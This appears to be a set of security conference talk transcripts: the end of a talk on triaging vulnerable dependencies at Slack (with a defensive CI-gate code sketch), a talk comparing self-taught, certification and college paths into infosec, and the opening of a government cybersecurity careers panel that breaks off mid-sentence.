The idea being: if you upgrade this one library, all of those findings are resolved. Now we can talk about our triage process a little bit. So the first step would be that the ticket gets filed and the product security engineer on call will triage it. Our triage process is just enough so that we can find out how serious the vulnerability is in our systems. We would read the proof of concept from the Sonatype database and then check our source code to see if we are in fact using those vulnerable functions, because if we weren't, then it wouldn't be a critical vulnerability for us. It would be a low, or maybe even a non-fix. If we are using it, we might try to reproduce the attack, or if it's used in multiple places, we're just going to look at enough of them to determine a severity for fixing. If it's used in hundreds of places, we can't test every single one, so we would then recommend it be a medium or a high depending on what we thought. And we're also going to review the fix that's in the upgraded version, just to see if there's anything more we need to consider when implementing the update. All of this is just to either confirm the severity based on the CVSS score or adjust it as needed. From there, we would find the responsible team. So after determining whether or not we could get exploited, we need to find the responsible team to fix it. That team is then going to be responsible for remediation in the SLA time that we've already determined based on the severity. Lastly, once the package is updated, Ossify is going to go in, automatically see that that version is no longer used, and remove it from our list. And then the vulnerability is remediated. Now that we have a working process that fits into what we're already doing at Slack, there's still a lot of future work to be done. Right now, we're working on getting to a clean state for vulnerable packages and working down our backlog to determine if the packages that are currently being flagged are vulnerable and get them fixed. Next, this process, as you can tell, still involves a lot of manual work. There's a lot of manual work for the product security engineer to find out who owns the vulnerable dependency and also to see if it's exploitable. So we would like to figure out a way to determine that automatically instead of having it be a manual process. That's going to mean looking into how we can track when new libraries are added. And thirdly, we'd love to integrate this process into our CI/CD pipeline, so packages that are vulnerable aren't uploaded to our code base. So on commit, it would run the scanner, look for any open vulnerabilities, and then either block the change or let it through if there aren't any. Thank you so much. Special thanks to Matt, who did Ossify development for us, and Nikki and Oliver for our previous version of this talk. If you have any questions, we'll be in the Discord chat to answer them. Thank you.
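As a companion to the CI/CD integration the speakers say they would like to build, here is what a minimal pre-merge gate could look like: run the same coordinate scan and fail the build if anything comes back. This is a speculative sketch, not something described in the talk; it reuses the scanCoordinates helper from the earlier OSS Index snippet, and the lockfile handling is stubbed out.

```typescript
// Speculative CI gate: fail the build when any scanned coordinate has findings.
// scanCoordinates() is assumed to exist from the earlier OSS Index sketch;
// a real version would also walk package-lock.json to build the coordinate list.
declare function scanCoordinates(coords: string[]): Promise<
  { coordinates: string; vulnerabilities: { id: string; title: string }[] }[]
>;

async function ciGate(coordinates: string[]): Promise<void> {
  const reports = await scanCoordinates(coordinates);
  const flagged = reports.filter((r) => r.vulnerabilities.length > 0);
  for (const r of flagged) {
    console.error(`BLOCKED: ${r.coordinates} has ${r.vulnerabilities.length} finding(s)`);
  }
  // A non-zero exit code fails the CI job and keeps the vulnerable package out.
  process.exit(flagged.length > 0 ? 1 : 0);
}

// In CI this list would come from the lockfile of the commit under test.
ciGate(["pkg:npm/node-forge@0.9.0"]);
```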
|
Come on our journey of creating scalable tooling and processes to automatically identify vulnerabilities in third-party libraries and handle the question of “ok we found this, who’s going to fix it?”
|
10.5446/51577 (DOI)
|
Welcome back to the career hacking village here at Defcon Safe Mode. Many times when we're talking on social media or on Discord, we're always asking what is the best career path. And several times people will say, no, this is the way, no, this is the way, no, this is the way. What we can tell you is that there are many different ways and I'm really excited to have my friend Pablo explain how he sees it and his recommendations on your career path. Take it away, Pablo. Thanks, Kathleen. So this talk is titled In Theory, There's No Difference Between Theory and Practice. And so where did this come from? First of all, it's normally attributed to Yogi Berra who dropped other pearls, like when you come to a fork and a road, take it, but this was actually not one of his. So the difference between theory and practice actually, according to Snopes, appeared first in a 1986 book about programming, the art and science of programming. So I thought it was apropos. A lot of times when we talk about how to get into infosec, we devolve into this discussion about going to college and learning theory or the school of hard knocks, learning practice. And so there's always this push and pull between theory and practice. So why are we here? As Kathleen mentioned, about every six months or so we see these kind of flame wars and discussions pop up on Twitter about how do you get into infosec? And it comes from all sides. So you have some people that believe that security is a prestige class and that you have to spend 10 or 15 years on a watch floor or on a call desk before you can join security. And you have some people saying, look, I didn't go to college. I've got a fantastic infosec career and I make a ton of money and the college kids seem really upset by that. And the truth is, there are many paths and they're all valuable. It's a matter of what you want to get into it and who you are as a person. So I thought it would be best to have a nice balanced discussion on that. So why do we even have this discussion? Why does it matter? Well, we all go through these little life transitions, right? We finish a school, be it high school or college or a trade school that we have to go out and find work. Many of us serve some time in the military and we have to figure out what we're going to do once we take the uniform off. Some of us have life changes. We get married or we have kids or something in our life changes and we decide that we want to do something else. Or sometimes our careers just go away or we decide we're just dissatisfied with our careers and we want to get into this thing called infosec. And so how do we really do that? So some disclaimers. First of all, these views are mine and mine alone. They don't belong to my employer. There's an exception to be found for absolutely everything I'm going to say. So if you try to find fault with this talk, congratulations, you will. Again, these are my opinions and what I've experienced. And those opinions are based upon my observations. But I'm also going to freely admit that I have biases, right? I took a very particular path and I've seen what I've seen and I haven't seen what I haven't seen. And so your mileage may vary. So a little bit about how my path came into infosec so that you understand kind of my latent biases. I've been doing this for a little bit. I got access to my first 8088 class computer in 1981 and then played with modems and BBSs. In the early 90s, I was a developer for expert systems. Those of you that are in AI may know what that is. 
In 1993, I went through a life change and I decided to join the United States Navy. Got a degree in computer science in 1998, spent some time at NSA. Got a master's degree in computer science 10 years after my bachelor's. Went back to Cyber Command. Then was faculty at the Naval Postgraduate School teaching master's level computer science and information sciences. Then I went to US Special Operations Command's hacker makerspace called SOFWERX. And I just finished a PhD in information sciences. Now that said, the picture is a little dated, but you might be able to make out that that's actually me with the rest of the school of root. So I have been in the community for quite a while. So with that all being said, we're going to have this discussion. Let's try not to turn it into a flame war. We can disagree, but we should be respectful about how we disagree with each other. So those of us that have been around for a really long time remember the quote unquote traditional path into an infosec job. There was no cybersecurity degree when I came up and went through college. And so the running joke was that if you wanted to be a computer security expert, you could either, you know, go out and work on a SOC watch floor, become a forensic analyst, and then the lab director, and a chief security officer, and 20 years later you would be a highly paid consultant, or the hacker method, where you became a hacker, you became a criminal, you got convicted of a crime, and two years later you were a highly paid consultant, maybe 14 months with good behavior. Those days, unfortunately, or fortunately, depending on your standpoint, may have gone by the wayside. So what are the contemporary paths? How do most of us get into infosec careers this year? Well, there's typically three paths. There's the School of Hard Knocks, there's the certification path, and then there's the college education path. And each of those comes with its own pros and cons. And so we should discuss those a little bit. So the first one is the School of Hard Knocks. This is where you kind of teach everything to yourself. It's a very traditional path for hackers because there used to not be college classes, there used to not be a CEH or a CISSP. You had to go out and read Phrack Magazine and read 2600 or go to hacker boards and teach this stuff to yourself. One of the pros is the cost. The cost is essentially free. You only learn the things that you're interested in learning, you don't have to bother with any baseline things you don't care about. It takes the least amount of time before you get to the subjects that you care about. We'll come back to that least amount of time. And you get practical skills now: you learn what you need to solve your problems. And so you become a practitioner immediately. And really, you're only limited by your personal drive and talent. Nobody's going to tell you that you've got to learn about X before you learn about Y. Nobody's going to tell you that you have to spend two years doing this before you go do that. You can just hop right in and do the things that you're interested in doing. So what are the cons? Well, I mentioned time, least amount of time of the three paths. Well, that depends on how you cut it. Generally speaking, there was a book called Outliers by Malcolm Gladwell that says, in order to become an expert in any one thing, you have to spend 10,000 hours doing it.
So 10,000 hours, if you break it out into eight hour workdays, comes to 3.42 years, which sounds remarkably like a bachelor's degree, which takes about four years. And when you add summer vacation and when you add spring break, you're at four years. You can do it faster. And again, your mileage may vary. If you're a very talented, very driven person, you might be able to do it in less time. But it is still a substantial amount of time if you want to become an expert. Typically speaking, when you go through the School of Hard Knocks, you're all practice and very little to no theory. And the problem with all practice is that the tools change and the tactics, techniques, and procedures change and the approaches change. And if you're not based in a theoretical background and you're not actively using it, those skills become very perishable. And so if you're not actively using it, you're going to lose it very quickly and you're going to have to come back and reteach yourself. Employment opportunities: boutique shops are a good opportunity for you because they're smaller and they're willing to take a chance. A lot of the boutique shops are started by rock stars in this community, and they didn't take a college education in many cases. They learned through the School of Hard Knocks and so they understand it. Independent consultant is another one. You have to do your own business development, but you can certainly do that. You can certainly get hired by a corporation too, but the challenge with getting hired by a corporation without a degree is you have to pass the HR check, the human resources check. And the problem with that is the way that the industry has moved is a lot of times, unless you get a personal introduction, you have to go through an automated resume system and it's looking for certain ticks. And if you don't check one of those ticks, like maybe they require a bachelor's degree, your resume may never get seen by an actual human being. The other issue with the School of Hard Knocks is survivability. So when we go through hard economic times, what happens is usually there's an accountant somewhere, an executive somewhere that wants to cut cost. And the first thing they cut is high cost assets which don't have a whole lot of background. It's easy to justify in a business sense paying somebody with an advanced degree a large sum of money because they've got a demonstrated record that the school vouches for. That may be harder if you learn through the School of Hard Knocks, unless you're a name brand. If you're a name brand then that may be different. But it is something to consider. So here's a fantastic example of an absolute rock star who came up through the School of Hard Knocks: Frank Heidt. So Frank had started in this earlier than I did. He started with a PDP in 1979 at his home. In 1981 he emancipated and went to go work for Chase Manhattan. Never finished 10th grade. So not only does he not have a college degree, he doesn't have a high school diploma. He's one of the best-read, most educated people I know without any formal education, because he's just a tremendously driven and intelligent individual. In 88 he went to work for the New York Transit Authority, created the emergency 911 system for MCI, went to go work for NAFSE and SWIFT PAC which are Navy entities, founded an NSA penetration testing operation in 1997, and became the 10th employee at @stake in 1999.
And since then he's founded Leviathan Security, which has a tremendous name in the industry, and he's been a TED speaker times three. So again, no formal education, just a tremendously talented, driven individual with a curious mind. So absolutely you can do this without certifications, and you can absolutely do this without education, and here's a fine success example. So the other way is certifications. Those have come into vogue of late and we've all kind of heard the names: there's your CEH and OSCP and OSCE and CISSP, and what are all these things? Well, the first thing to be aware of is not all these certifications are created equal and they're intended for different audiences. For better or worse, if you want to work for the US government you're probably going to do much better if you have a CISSP, and that's actually true in industry. I've got one. I've got my own thoughts on that certification as compared to other certifications, but it's important for you to weigh what it is that you want to do for a living, what kind of career you want to have, and see if that certification is going to help you get that job or help you become more proficient in what you want to do. Many of the certifications focus on practice with little to no theory, but there are some exceptions. They're vendor motivated. Those certifications are there to make money. They want to sell you a boot camp, they want you to pay for the class, they want you to pay to take the certification, and then they want you to pay fees to maintain that certification. There are lots of paths to getting these, but primarily you can take a class, a boot camp, or you can do online and self teaching by picking up a book. Most of these certifications have books where you can teach yourself the same things, and then your certification exams tend to be either proctored exams, which means that you go to a testing facility and they verify you are who you say you are before you take the exam, or online exams. One of the things that does come up, and it was a problem in the past with some of the certifications, is that with the online exams you could actually go out and pay somebody to take the exam in your stead and get the certification. Once that's out, those certifications become less valuable in the eyes of industry. Just be aware of that. What are the pros of certifications? It's a great boot camp. If you are starting at zero and you don't know how to get going, you are going to get lots of practice in a very short amount of time. Most of these boot camps are a couple of days or maybe a week long. Some of them are a little bit longer if it's a program. You are going to go from nothing to functional in a very short time. Theory may vary, but typically there's very little theory in these. If you do a boot camp you are going to get some instructor-led learning, which means that you are going to have somebody that is a subject matter expert to answer your questions. There is going to be a defined progression of knowledge. If you don't know where to start or where to go next, typically these boot camps will help you out with that. The certifications, many of them will help you pass an HR check because they are familiar with the vendors, they're familiar with the certifications, and they are familiar with the knowledge you have to demonstrate in order to achieve those certifications. In many cases those automated resume checkers will actually tick the box if you have the right certifications that they are looking for.
What you are looking out of the screen now is two courses. In the red box is one course and in the blue box is the other course. My question for you is what is the difference? I will give you a few seconds here to read it. Good. Both of these are actually courses in exploitation development. One of them is a masters level course. The other one is a course from a vendor that you take in one week. The masters level course takes 12 weeks. The vendor course takes one week. You are covering the same information. What you should think about is if you take it in 12 weeks, are you going to get a much deeper understanding and much more practice than if you take it in one week? I would suggest that, yeah, you will. If you are spending 12 weeks with the material, you are going to spend more time exploring that material and going deeper on it than if you spend one week. That doesn't mean that you are missing out on a whole lot of stuff. You have taken the one week. Just be aware that a one week boot camp is going to give you an introduction to all of these subjects. You will have to go through and spend some of your own time really studying it. What are some of the cons of certification? I went out to a well-known vendor who will remain nameless. I pulled up the cost for achieving their certification. Their one week class is $6,200. Then you have to wait a certain amount of time before you can take the certification. If you want access to their online labs after the course, it is another $729. We are up at $7,000. Then each certification attempt is $729. You are up close to $8,000. That is if you pass it the first time. For whatever reason you fail it and you have to go back and take it, you will probably need access to the labs and you will probably need to pay for another certification event. That is another $1,500 every time you fail to pass. On top of that, you will have to pay to renew this every three to four years. At $8,000, we will talk about the cost of college later, but $8,000 is a substantial amount of money. Not just compared to college, but compared to anything. $8,000 is a substantial amount of money. The other part is, as I mentioned, certification tends to be tools focused. Not always, not all certifications, but they tend to be tool focused. They are perishable. If you take a certification and you don't do that on a daily basis for your job, your skill in that set is going to deprecate. The other thing is, what do they demonstrate? There is this ongoing discussion that always happens about does that demonstrate knowledge or does that demonstrate your ability to take an exam? Other people have their own biases on this. I absolutely know people that could not pass a certification exam that absolutely had mastery of the material. They just couldn't take a test. I have also seen it the other way, where somebody passes the test and they clearly knew nothing about the material. There is really a discussion there that happens and hiring managers will think about this, about does the certification really demonstrate that you know what I need you to know? Let's talk about college. I know that this is a very personal subject for a lot of people. Not all schools and all programs are created equally. If you go and get a computer science from a degree from MIT, it's going to be very different than if you go to a computer science from maybe a community college or from University of Phoenix or some other schools. 
Take a look at what the reputation is not just of the school but of that particular program in that school. Most of you have never probably heard of University of Texas Dallas. They happen to have one of the top ranked schools for computer science in the country. University of California, Santa Barbara has one of the top ranked schools for cybersecurity based computer science. Really take a look at the programs, take a look at the schools and realize that they're not all created equal. Most of the colleges will focus on theory with varying levels of practice. Again, that is a question that you should ask when you're considering a school and a program. How much is this theory and how much of this is practice? Then the other question you want to ask is do I want to just study? Do I want to become a full-time college student or do I want to work and study? Some of us, we're not going to have that option. Our life situations are such that we've got people that depend on us, we've got dependents, and so we're going to have to work and study. That's okay, but for those of us that have the choice, we've got to balance possibly taking larger loans out to concentrate on our studies, vice taking smaller loans out and working and studying, and that's very much a personal choice. Job placement. If you're going to go to a college, you should find out if they're going to help you get a job afterwards. College degrees are not cheap. They're very expensive, and so getting the degree shouldn't be where your college stops. If your college or university should help you with job placement afterwards. Then there's a value proposition versus cost. Getting a college degree in something that is not marketable is a personal choice. Really, if you want to work in Infosec, that history degree may or may not help you, and we'll talk more about unrelated degrees either, but if you know you want to work in Infosec, perhaps you want to consider cybersecurity or an IT or a computer science degree. But there are other degree paths. You can either get an unrelated degree and get into Infosec, or you can get a related degree and get into Infosec, and those have their own pros and cons. I'll show you an example of somebody that has an unrelated degree and has a fantastic Infosec career. The pros of colleges is that all industries and all companies recognize bachelor's degrees and master's degrees and PhDs. They're resilient. They tend to be theory focused, which moves at a much slower pace than practice. The tools change the theory very rarely does, but if you've got a degree in that field, you're going to get that HR pass. If they're looking for a bachelor's degree, I'm not aware of somebody that says, well, you've got a bachelor's degree, but it's not the right bachelor's degree and therefore we're not going to take you. Job survivability, I talked about when we hit hard economic times. The people with degrees that are working in a field with their degree tend to be more survivable than the people that don't have degrees that are working in a field. Right, wrong, or otherwise, it's just kind of how it happens. It's a non-perishable skill. Right, again, I talked about the 10,000 hours become an expert, 3.42 years. That's roughly the amount of class time that you're going to spend getting a bachelor's degree. Writing. Writing is absolutely critical. I'll talk more about that. You're going to spend a lot of time writing in college. 
You can be the best penetration tester in the world, but you have to be able to communicate your findings in writing. And if you can't do that, you're probably not going to be hired back. Non-related courses. Is that actually a benefit? I actually believe it is. It's easy for us to learn things that we're interested in within our chosen major. It is much harder to pay attention and learn things that we're not familiar with and we're not good at. But learning is like anything else. The more you practice at learning, the better you become at learning. And so as you're asked to learn new things throughout your career, it actually becomes easier to learn things the more you've practiced it. And then cost. It may or may not be a pro. Again, that depends on how you choose to fund your college education. If you use grants and scholarships, then cost is probably not prohibitive. But you also have to make some lifestyle choices about how you want to live while you're going through college. Otherwise, you're going to end up racking up a lot of debt. That may or may not be a good value proposition. So, writing and unrelated courses. Writing is absolutely critical for success. That's not just me saying it, that's Lenny Zeltser. Lenny Zeltser, among various and sundry other things, is a fantastic SANS instructor, and he teaches the reverse-engineering malware course. And he says, listen, if you want to excel in information security, you've got to have strong writing skills. Often these things are ignored. Many of us don't like to write. I am not a fan of writing. I'm not going to sit there and practice writing. I don't do short stories or any of those things. Lots of people do and I envy them. It is something that I've had to work very hard at. Most of us in this field tend to ignore writing because we're more interested in the technical skills. But just like technical skills, writing requires practice. And so if you go to college and you're forced to take unrelated classes, you're going to be forced to practice writing. And it's one of those things that if you're not going to do it on your own, you need to find somebody that's going to force you to do it. This may help you do it. The other thing is that understanding other fields helps you explain things. Very rarely are we going to do infosec for the sake of infosec. Normally we're going to do infosec for the sake of a company, and that company's mission may not be infosec. It may be a bank. It may be an educational institution. It may be an engineering institution. And if you can't understand what it is that that company does, you're probably not going to be able to communicate very well why they should be concerned about infosec. So what are the cons? Well, cost, right? You have to be cognizant of the financial cost of college. College is definitely not cheap. You have to make some choices about how you're going to live. You have to think about the applicability. Unrelated courses are going to be required. Listen, any degree that you get, you're going to have to take English composition and you're probably going to have to take history and you're probably going to have to take college math. It's something we all kind of suffer through. But you're just going to have to do that. The baseline related courses are good because that's where you get your introduction to theory. But they tend to be not very exciting. For those of us that love this stuff, we already kind of know how to program in Python, right?
We don't really need an intro to Python class, but the college is probably going to require that if you're taking computer science. And so you're just going to have to suffer through it. One of the criticisms is that college is not practical. They tend to be a little bit behind. And that's true in many programs. They're not keeping up with the latest and greatest because they're not trying to teach you practice. In many cases, they're trying to teach you theory, which moves at a much slower pace. The other problem is time. College requires a significant time investment. Even if you're a full-time student, it's probably going to take you three or four years to finish a bachelor's. A master's is going to take you, even if you're a full-time student, probably two years. So let's talk a little bit about the cost. This is the average cost as pulled from an independent journalist for a university. So a public two-year in-district is $3,400. A public four-year is $9,000. Now, if you remember a few slides ago, we talked about certifications. And a one-week class and a certification attempt was $8,000. So for $1,000 more, you get to spend an entire year at a university becoming a dedicated learner. So what's the value proposition there? If you're going to go to an out-of-state school, yeah, it's going to be a lot more expensive, right? You're looking at on average $24,000. And if you go to a private university, you're looking at $32,000. So these are all things to keep in mind. Maybe the best option is not to move far away from home, unless you're chasing a particular school and a particular program because they really teach exactly the things that you want to learn or they have good insight into the industry that you want to go into. If you want to work in Silicon Valley, absolutely go to a University of California school, right? Because they're there and they have established relationships. But these are just the costs for tuition and fees. These don't include things like your living expenses. They don't include things like your meal plans. And they don't include things like your books. Let's have a little bit of a discussion about reducing cost. This is a mock-up of my dorm room. Actually, that's not quite true. This is a mock-up of the dorm room after they remodeled it after I graduated. It looks pretty much like a prison. I lived a very spartan lifestyle, but because I did that, I incurred very little cost. Actually, in my case, I incurred no cost. But if you want to have a really nice apartment and you're a full-time student and you're not working, recognize that your lifestyle is going to go on your student loans. And so that's going to drive up your cost. And so while I fully recognize that college is expensive, I often question when people say, well, I've got $100,000 of debt for going to school. And I ask if they lived in a dorm and they show me pictures of this fully laid out apartment with giant screen TVs. Delayed gratification is a thing. If you don't want to incur a lot of cost while you're in college, you may want to cut back your living expenses a little bit. So, cons of college: the applicability. You're going to be taking a lot of unrelated courses. You're still going to have to pay for those courses. Again, they're tangentially related. Practice varies. Not all programs provide you the same amount of practice. And not all schools are the same. Contact hours with your professors and your instructors matter. Faculty that have been in the real world and really are subject matter experts matter.
One of the things I will tell you is you are going to meet a lot of faculty members at some schools that have never been in the real world. They've spent their entire life in academia. And so their view of industry and what's needed to succeed in the industry is going to be very different than someone who has spent some time in the industry doing it. Usually you get "good, fast, cheap: choose two." With universities and college education, it's normally choose one. There are some that are good and cheap. That's rare. You really have to be lucky enough to be living close to a school that has a good program. But they're definitely not fast. If it's fast, there are some schools out there that are online and they will tell you that you can get a master's degree in one year. It's probably not going to be cheap and it's probably not going to be good. Let's be honest about that. So go into it with your eyes open. The other thing that you see is a lot of schools are going to advertise that they're NSA academic centers of excellence. I will tell you, having taken two schools through that certification program, that that certification is absolutely worthless. It is not that hard to get accredited as an NSA academic center of excellence. And it's a paperwork drill. The NSA asks schools to make sure that they teach certain things. And if they have one slide on one course that mentions that subject, then they get to claim that they taught it. That is really not what NSA and Cyber Command were after. So I would not really consider that academic center of excellence certification for a school worthwhile. Don't buy that. So, another con: the applicability. I used to teach not just at the graduate level but at the undergraduate level, and I happened to teach one of the last classes that my undergraduates took before they graduated. And many, many, many of my students would come to me and go, hey, listen, you know, Professor Breuer, loved your class. It was great. I'm about to graduate with a bachelor's degree in computer science. I don't feel qualified to do anything. Congratulations. You're not alone. We all feel that way. If you spend any time in infosec, you're just going to get used to the imposter syndrome. I still have it. Many of the people up on stage today are still going to have it. But what you need to realize is that having a degree doesn't demonstrate that you're an expert in something. A bachelor's degree demonstrates that you're capable of being taught and learning new things. And so your employers know that because you've got a bachelor's degree in computer science, they don't expect you to hop in and be an expert programmer. They expect that when they stick you with a more seasoned senior programmer, they're going to be able to teach you the things that you need to do to accomplish your job there. A master's degree doesn't mean that you're a master of your trade. It absolutely does not. What it means is that you're capable of teaching yourself. If you don't know something and you're asked to do it, you're capable of going out and finding resources and teaching yourself. And a PhD absolutely doesn't mean that you're an expert in anything. What it means is that you're capable of conducting independent scientific research. So a lot of people do ask me, because I've just got one, should I get a PhD? And my answer to this is you should only get a PhD for three reasons.
The first one is if you want to work in academia. If you want to be a university professor, absolutely go get a PhD. There's a hard caste system in there between tenure track PhDs and non-tenure track PhDs and then lecturers. The other reason is if you want to do research, professional research, for your career: go get a PhD. And the last reason to get a PhD, which was my reason, was I just wanted one. Does it really help your career? It's arguable. I would say in most cases the juice is probably not worth the squeeze on that one. It was just a personal goal I'd set for myself for reasons that, well, I'm just not going to get into, but just be aware of what those degrees are supposed to demonstrate. None of these demonstrate that you're an expert. So, unrelated degrees. Everybody needs infosec, right? It doesn't matter if you're a book publisher, if you're a bank, if you're a manufacturer, if you run industrial plants, all these things right now run on IoT and computers. And so they all need infosec. And taking these unrelated courses helps you learn the language of non-infosec people. If you're an infosec person and you go talk to your boss at a bank about IP addresses and ROP, they're just going to run you out of the room. They pay you good money so they don't have to hear that language. They want to know, you know, what do I gain? What do I lose? What does it cost? And why do I care? So you're going to have to translate the geek speak and the infosec to business processes and thought processes of executives. Baseline courses, regardless of degree, are going to be the same. It doesn't matter if you're going to get a bachelor's in history, a bachelor's in women's studies, a bachelor's in computer science, or a bachelor's in electrical engineering, you're all going to have to take college math, you're all going to have to take English composition. Those baseline courses are the same and they're meant to be a good foundation for the rest of your learning. I mentioned writing practice. You're going to need a lot of writing practice regardless of your degree. That writing is important. It's actually critical, I would say. In many cases, it's at least as critical, if not more critical, than your technical knowledge. But if you're going to get an unrelated degree and you want to work in infosec, at some point you're going to have to come back and either get some training or some education on the tech side. You can't just hop in from a history degree and decide that you're going to be an infosec analyst without going back and actually understanding what some of the infosec language means and understanding something about how computers and networks work. Here's a fantastic example of somebody that's successful with an unrelated degree. Tracy Maleeff, many of you know her as InfoSecSherpa. She's got a bachelor's in history and she's got a master's in library sciences. She spent 10 years working as a librarian, then was a cyber analyst at GlaxoSmithKline, got her first infosec certification in 2017, and in 2019 she became an infosec analyst for the New York Times. So library sciences doesn't seem like it's a related degree. However, what it taught her was how to do research very, very well. She's certainly a much better researcher than I am, and it taught her how to write exceedingly well. And because of that she's been tremendously successful not only in the hacker community but as a professional infosec analyst.
So absolutely, all degrees are valuable and you certainly can work in infosec if you have an unrelated degree. So Immanuel Kant said that experience without theory is blind, but theory without experience is mere intellectual play, and it's true. You need both. You need a little bit of theory and you need a little bit of experience and practical knowledge if you want to be successful. Otherwise you're really just a one-sided professional. So you need a bit of both. So great, I've got more questions about this. Where can I go for learning and networking resources? Well, congratulations. If you're listening to this you're already doing that. DEF CON and hacker conferences and hacker collectives offer great insight. They're a great place to meet people that may be doing things that you're interested in or that have good and bad experiences to share with you on their path. Makerspaces. There are makerspaces throughout the country and throughout the world. Lots of professionals who have a passion for infosec and what they do are willing to share their experiences and share their knowledge for little or no cost. Capture the flag exercises are great. One of the things I often hear is, I don't feel like I know enough to do capture the flag exercises. That's great. If you knew how to do the capture the flag exercise it wouldn't be fun. So what I would say is go out there and try it and figure out what you can figure out and what you can't figure out. Go back a week later and what you're going to see is that the teams that did well did write-ups on how to solve the challenges, and that's going to give you insight into not only how to solve the challenges but subjects that you may want to go back and learn more on. Mentors and mentees. Everybody needs a mentor. I've got several and I learn a lot from my mentors. Here's a hidden trick though: I learned far more from my mentees than I learned from my mentors. They often ask me questions where I go, you know what, I actually have no idea, and I have to go back and research it and I have to learn it well enough to explain it to my mentee. So both being a mentor and a mentee is a great way to learn things. There's lots of free online training, everything from YouTube to online classes to Khan Academy. Hacker cons, you can attend or you can volunteer. Attending is always great because you get to go to, ideally, all the talks that you want to do. A hidden trick of mine is to volunteer at the cons. I've been doing it for a long time, particularly if you volunteer for speaker operations. You get a lot of one-on-one time with the speakers. You get to ask questions without anybody else in the room, so that's really, really great. For military members that are leaving, there's a program called SkillBridge where you can go get an internship for six months at a company. That company doesn't pay your salary. The DOD pays your salary, so they get a free intern. You get free job experience. You get to try out that company and decide if you really want to get hired there. So that's a great deal. For college students and for people taking either the School of Hard Knocks or the certification path, go get an internship, either paid or unpaid. Internships are great. Not only do they let you gain some skills, they let you learn about the company and let the company learn about you, and oftentimes you get a job not because you submitted a resume but because you have a personal relationship with somebody in a company.
Professional organizations, (ISC)², ISACA, all of those tend to have monthly meetings. Those are great. Go network, go talk to people. They will give presentations. If you want to know how they got to learn about what they learned, they will tell you. Oftentimes they're happy to do that. Boot camps and lunch and learns: a lot of organizations will offer boot camps and lunch and learns for free in some cases, because they want you to sign up for their paid classes later, but you don't have to. You can go for an hour and learn about network recon or OSINT or whatever it is that they're talking about. So, lots of free resources out there. So at the end of this, what's the best solution? It's to choose your own adventure. If you want to be a ninja, do all three paths. Do some experimentation on your own. Go through the school of hard knocks, get some certifications, take some college classes, get a degree, but choose a path and start on it. A journey of a thousand steps: you have to take that first step. What you should consider is, what are your goals? When you start on this journey, what is your next goal that you want to achieve and how can you best get there given your timeline, your finances, and your goals? So there is no wrong path. There are pros and cons to all of them. Eventually, if you want to be a professional, you're going to find out that you've done all three, and so it's really just a matter of which path you want to start on first. There is no wrong path. So with that, thanks so much for your time and I will be on the Discord if you have questions. Have a great day. Pablo, thank you so much for all of that. Just a great overview, because as you said, we tend to have this discussion and everyone camps in "my way is right, no, my way is right," and really, everyone needs to customize their own career path and take bits and pieces depending on your finances and where you are in life, all of it. And that's what's so great about the industry: we have so many resources. We have so many role models. We can craft our own path, and employers are also starting to really realize that experience can outweigh certifications, but it's going to change depending on the employer. I really appreciate you pulling this presentation together and also all your great comments to people's questions in Discord. I want to remind everyone that we're doing resume review and career coaching all day Friday and all Saturday afternoon. You need to sign up in the Discord channel. Pablo, thank you so much. I can't wait to be able to hug you in person. Thanks Kathleen. Looking forward to seeing you. Take care.
|
There are three general paths to an infosec career: the school of hard knocks, certifications, and college. Every few months a flame war erupts arguing which is the "right" path. What are the pros and cons of each of these paths? Come have a balanced conversation about the three paths and learn which is the best one for you depending upon your unique needs.
|
10.5446/51578 (DOI)
|
And welcome back to the Career Hacking Village. One of the things that is always of interest to many people are the various different career paths that are available in government agencies and various different agencies that are part of national service. It is our honor and pleasure to have a group of people here to share with us the various different opportunities where talented professionals can work to support our country. I would like to turn this over now to Joe Billingsley, the founder of the Military Cyber Professionals Association. Joe. Hi, Kathleen and everybody. I really appreciate the opportunity to lead the very first national security panel at the Career Village. It's really inspiring the intent behind this village and also Jeff Moss's words about connecting people with knowledge about different career opportunities for folks across the community here. So I'm really excited to be part of that and to introduce you to a number of friends and partners from different parts of the U.S. government who can tell you about different organizations and programs. And it's just a really exciting all the different stuff that's happening across the government and different opportunities to serve. First quick introduction of myself. Joe Billingsley, founder of the Military Cyber Professionals Association, a 501c3 charity that supports STEM education for K through 12 and also active duty military and veterans. I founded that with the motivation of us doing a better job as a community for those who are in the service today and who might want to serve in military capacities in the future. In addition to that, my day job, I'm a government civilian employee over at a school called the College of Information and Cyber Space. It's a really exciting place to work. It has a really long history going back to the 1960s when it was the DoD Computer Institute or the Department of Defense Computer Institute and had faculty like the legendary Grace Hopper working there. So a really fun and exciting place to work. That's also part of the U.S. government. Now I'd like to quickly go down the list of panelists that we have here today. We have John Felker who's the assistant director of the Cybersecurity and Infrastructure Security Agency, CISA, over at the Department of Homeland Security. We have Diane Janessek, the commandant of the NSA's National Cryptologic School and also president of the Women and Cybersecurity Mid-Atlantic Affiliate. We have Chris Pimla, an engineer over at the U.S. Digital Service. We also have Roman Witkovitsky who's from the U.S. Marine Corps Cyber Auxiliary. And finally we have Liz Popiak, the recently retired Lieutenant Colonel who helped create the U.S. Army Cyber Specialty Direct Commissioning Program. So with that, I'd like to start off and give each of you an opportunity to introduce yourselves and tell us about your organization or program that you're here to talk about today. But we'll get started with John. Go ahead. Thanks, Joe. I appreciate the opportunity to be here today and to be with some really great people that are interested in this effort, particularly the efforts around the workforce. So a little bit about CISA. CISA is a relatively new organization. It's been in a transition from a DHS headquarters element to an operating component since legislation was signed in late 2018 that created CISA as an agency. Our major role is we serve as the nation's risk advisor. 
And risk in terms of both cyber, physical and emergency communications aspects of critical infrastructure and the federal government. So a lot of people don't know what we do. That's it in a nutshell. We have basically five priorities that are the focus of what we do, all related around the federal.gov space and the critical infrastructure of the United States. If you keep in mind probably 80% of the critical infrastructure in our country is privately held. And so almost everything we do is voluntary. And in that five level priority list, election security, maintaining supply chain risk awareness and countering, particularly from China. And that's most apropos now because of the rollout of 5G technologies, protecting federal networks, securing soft targets, so stadiums, churches, those kinds of things. And then recently evolving but always been important is critical infrastructure protection for industrial control systems. So all those systems that operate the electric grid and water stations and wastewater facilities and all those kinds of things. So it's a big mission. We are a nationwide organization. We obviously have a headquarters element in the Washington, D.C. area, but we have folks out in the real world too, all over the nation in 10 different regions, supporting those basic mission areas of security for cyber, critical infrastructure, and communications. That it? Great. Thanks a lot, John. How about you, Diane? Well, hello, everyone. So I work for the National Security Agency and it is an honor to be on this career village focusing on national security because as we all know, cybersecurity is definitely a huge factor in our nation's national security and our economic security, right? Rest upon a secure digital foundation. So really a pleasure to be here. So the National Security Agency is a fabulous federal agency where I currently 